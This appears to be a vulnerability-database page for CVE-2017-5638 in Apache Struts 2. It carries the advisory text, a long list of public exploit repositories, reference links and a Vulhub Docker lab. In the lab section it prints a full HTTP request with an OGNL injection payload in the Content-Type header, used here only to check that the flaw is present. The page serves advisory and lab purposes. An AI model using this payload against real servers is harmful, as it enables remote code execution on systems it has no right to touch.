CRITICAL
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Weakness: Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
Published: 2017-03-11
Community Advisory
This section is open source, for any additional information that enhances or clarifies the official advisory above.
CVE-2017-5638 Exploits (70)
- mazen160/struts-pwn ( 387)
- Flyteas/Struts2-045-Exp ( 61)
- mthbernardes/strutszeiro ( 38)
- immunio/apache-struts2-CVE-2017-5638 ( 36)
- PolarisLab/S2-045 ( 23)
- jas502n/st2-046-poc ( 21)
- jas502n/S2-045-EXP-POC-TOOLS ( 21)
- ret2jazzy/Struts-Apache-ExploitPack ( 15)
- sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638 ( 14)
- xsscx/cve-2017-5638 ( 14)
Show all exploits (+60):
- jrrdev/cve-2017-5638 ( 13)
- tahmed11/strutsy ( 11)
- initconf/CVE-2017-5638_struts ( 8)
- Iletee/struts2-rce ( 8)
- payatu/CVE-2017-5638 ( 7)
- R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit- ( 4)
- opt9/Strutshock ( 3)
- falcon-lnhg/StrutsShell ( 3)
- 0x00-0x00/CVE-2017-5638 ( 3)
- opt9/Strutscli ( 2)
- oktavianto/CVE-2017-5638-Apache-Struts2 ( 2)
- lolwaleet/ExpStruts ( 2)
- win3zz/CVE-2017-5638 ( 2)
- aljazceru/CVE-2017-5638-Apache-Struts2 ( 2)
- Greynad/struts2-jakarta-inject ( 2)
- m3ssap0/struts2_cve-2017-5638 ( 1)
- ludy-dev/XworkStruts-RCE ( 1)
- riyazwalikar/struts-rce-cve-2017-5638 ( 1)
- un4ckn0wl3z/CVE-2017-5638 ( 1)
- Masahiro-Yamada/OgnlContentTypeRejectorValve ( 1)
- sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner ( 1)
- grant100/cybersecurity-struts2 ( 1)
- andypitcher/check_struts ( 1)
- ggolawski/struts-rce ( 1)
- KarzsGHR/S2-046_S2-045_POC ( 1)
- projectdiscovery/nuclei-templates/cves/CVE-2017-5638.yaml
- 41570
- 41614
- HokieGeek/struts2-rce
- leandrocamposcardoso/CVE-2017-5638-Mass-Exploit
- mcassano/cve-2017-5638
- lizhi16/CVE-2017-5638
- rapid7/metasploit-framework/modules/exploits/multi/http/struts2_content_type_ognl.rb
- jrrombaldo/CVE-2017-5638
- jpacora/Struts2Shell
- invisiblethreat/strutser
- injcristianrojas/cve-2017-5638
- TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner
- homjxi0e/CVE-2017-5638
- sjitech/test_struts2_vulnerability_CVE-2017-5638
- gsfish/S2-Reaper
- eeehit/CVE-2017-5638
- colorblindpentester/CVE-2017-5638
- cafnet/apache-struts-v2-CVE-2017-5638
- c002/Apache-Struts
- Aasron/Struts2-045-Exp
- AndreasKl/CVE-2017-5638
- SpiderMate/Stutsfi
- bongbongco/cve-2017-5638
- donaldashdown/Common-Vulnerability-and-Exploit
- pasannirmana/Aspire
- bhagdave/CVE-2017-5638
- sabley1/struts2-rce
- jaeles-project/jaeles-signatures/cves/apache-struts-rce-cve-2017-5638.yaml
- sabley/struts2-rce
- random-robbie/CVE-2017-5638
- jongmartinez/CVE-2017-5638
- philaruff/struts2-rce
- Xhendos/CVE-2017-5638
- bryanwhyte/struts2-rce
CVE-2017-5638 Vulnerable Docker Environment
Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.
S2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)
Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
References:
- http://struts.apache.org/docs/s2-045.html
- https://nsfocusglobal.com/apache-struts2-remote-code-execution-vulnerability-s2-045/
Setup
Execute the following command to start the Struts2 2.3.30:
docker-compose up -d
After the container is running, visit http://your-ip:8080 that you can see an example of the upload page.
Exploitation
Verify the vulnerability by following request:
POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
233*233 has been successfully executed:
Official CVE References
View references (33)
- talosintelligence.com/2017/03/apache-0-day-exploited.html
- trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
- arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
- eweek.com/security/apache-struts-vulnerability-under-attack.html
- oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- securityfocus.com/bid/96729
- securitytracker.com/id/1037973
- arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
- apache.org/confluence/display/WW/S2-045
- apache.org/confluence/display/WW/S2-046
- 41570
- apache.org/repos/asf
- apache.org/repos/asf
- mazen160/struts-pwn
- rapid7/metasploit-framework/issues/8064
- www2.hpe.com/hpsc/doc/public/display
- www2.hpe.com/hpsc/doc/public/display
- www2.hpe.com/hpsc/doc/public/display
- sans.edu/diary/22169
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
- packetstormsecurity.com/files/141494/S2-45-poc.py.txt
- netapp.com/advisory/ntap-20170310-0001/
- apache.org/docs/s2-045.html
- apache.org/docs/s2-046.html
- lenovo.com/us/en/product_security/len-14200
- tweet by theog150
- 41614
- imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
- kb.cert.org/vuls/id/834067
- symantec.com/security-center/network-protection-security-advisories/SA145